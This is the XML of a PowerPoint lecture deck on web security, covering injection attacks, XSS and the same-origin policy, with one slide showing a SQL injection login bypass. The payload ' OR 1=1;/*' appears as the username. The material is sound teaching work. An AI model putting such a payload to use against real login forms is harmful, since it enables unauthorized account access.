              <a:t>Resulting SQL query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GB" sz="2000" dirty="0"/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 dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    SELECT * FROM Accounts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 dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    WHERE Username = ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’ OR 1=1;/*’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"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GB" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    AND Password = ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>secret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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3AC19209-84BC-4C93-8BB9-8FFDACA0DB23}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>9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/>
              <a:t>websec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4496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4455</TotalTime>
  <Words>4006</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>815</Paragraphs>
  <Slides>57</Slides>
  <Notes>20</Notes>
  <HiddenSlides>1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Arial Narrow</vt:lpstr>
      <vt:lpstr>Arial Rounded MT Bold</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Comic Sans MS</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Lucida Console</vt:lpstr>
      <vt:lpstr>Pieces NFI</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>In the news last week</vt:lpstr>
      <vt:lpstr>Application-Bound (App-Bound) Encryption [not exam material]</vt:lpstr>
      <vt:lpstr>HackNijmegen  aka  NymaCon</vt:lpstr>
      <vt:lpstr> Web Security   Server &amp; client side  security risks  (esp. injection attacks)    </vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Server-side injection attacks</vt:lpstr>
      <vt:lpstr>Injection attacks</vt:lpstr>
      <vt:lpstr>SQL injection</vt:lpstr>
      <vt:lpstr>SQL injection</vt:lpstr>
      <vt:lpstr>SQL injection</vt:lpstr>
      <vt:lpstr>Two types of SQL injection</vt:lpstr>
      <vt:lpstr>LDAP injection</vt:lpstr>
      <vt:lpstr>Blind injection attacks</vt:lpstr>
      <vt:lpstr>Blind SQL injection</vt:lpstr>
      <vt:lpstr>Blind SQL injection</vt:lpstr>
      <vt:lpstr>Other forms of information leakage: error messages</vt:lpstr>
      <vt:lpstr>    </vt:lpstr>
      <vt:lpstr>Client-side injection problems</vt:lpstr>
      <vt:lpstr>Search engine example</vt:lpstr>
      <vt:lpstr>Search engine example</vt:lpstr>
      <vt:lpstr>What proper input encoding should produce</vt:lpstr>
      <vt:lpstr>More complicated HTML code as search term ? </vt:lpstr>
      <vt:lpstr>More complicated HTML code as search term ? </vt:lpstr>
      <vt:lpstr> HTML injection</vt:lpstr>
      <vt:lpstr>HTML injection &amp; XSS</vt:lpstr>
      <vt:lpstr>Stealing cookies with XSS</vt:lpstr>
      <vt:lpstr>More stealthy stealing of cookies using XSS</vt:lpstr>
      <vt:lpstr>Scenario 1: reflected XSS attack</vt:lpstr>
      <vt:lpstr>Scenario 2: stored XSS attack</vt:lpstr>
      <vt:lpstr>Examples of XSS attacks</vt:lpstr>
      <vt:lpstr>JavaScript game injected into Blackboard.ru.nl</vt:lpstr>
      <vt:lpstr>Example: stored XSS vulnerability via Twitter</vt:lpstr>
      <vt:lpstr>Example: stored XSS attack via Google docs</vt:lpstr>
      <vt:lpstr>Example: Reflected XSS via error message</vt:lpstr>
      <vt:lpstr>Example: Twitter StalkDaily worm</vt:lpstr>
      <vt:lpstr>Websecurity.cs.ru.nl XSS attacks  (level 5 &amp; 6)</vt:lpstr>
      <vt:lpstr>  The power of  JavaScript &amp; the DOM API  and the Same Origin Policy (SOP) to rein it in</vt:lpstr>
      <vt:lpstr>Recall: dynamic web pages</vt:lpstr>
      <vt:lpstr>Languages for Dynamic Content</vt:lpstr>
      <vt:lpstr>JavaScript</vt:lpstr>
      <vt:lpstr>The power of JavaScript: session replays</vt:lpstr>
      <vt:lpstr>JavaScript  </vt:lpstr>
      <vt:lpstr>DOM (Document Object Model)</vt:lpstr>
      <vt:lpstr>DOM (Document Object Model)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Two security measures for JavaScript: Sandbox &amp; SOP</vt:lpstr>
      <vt:lpstr>Security measures for JavaScript</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Abusing trust</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SOP examples</vt:lpstr>
      <vt:lpstr>SOP tricky details: no help against XSS</vt:lpstr>
      <vt:lpstr>SOP tricky details: no help against malicious libraries</vt:lpstr>
      <vt:lpstr>SOP tricky details: CORS (Cross-Origin Resource Sharing)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erikpoll</dc:creator>
  <cp:lastModifiedBy>Poll, E. (Erik)</cp:lastModifiedBy>
  <cp:revision>255</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-01-30T10:46:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-25T12:26:11Z</dcterms:modified>
</cp:coreProperties>
</file>